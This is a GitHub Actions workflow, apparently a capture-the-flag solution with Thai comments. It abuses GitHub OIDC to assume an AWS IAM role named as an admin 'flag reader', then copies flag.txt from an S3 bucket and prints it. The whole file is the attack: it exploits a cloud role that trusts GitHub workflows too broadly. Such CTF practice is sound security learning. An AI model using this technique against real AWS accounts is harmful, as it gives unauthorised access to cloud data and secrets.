name: pwn-flag
on:
  workflow_dispatch:     # ให้เรากดรันเองได้จากหน้า Actions
permissions:
  id-token: write        # สำคัญ: ต้องมี เพื่อให้ OIDC ทำงาน
  contents: read

jobs:
  pwn:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875
          role-session-name: pwn-${{ github.run_id }}
          aws-region: ap-southeast-1

      - name: grab flag
        run: |
          aws s3 cp s3://oh-i-really-do-care/flag.txt ./flag.txt
          echo "==== FLAG ===="
          cat ./flag.txt
          echo "=============="
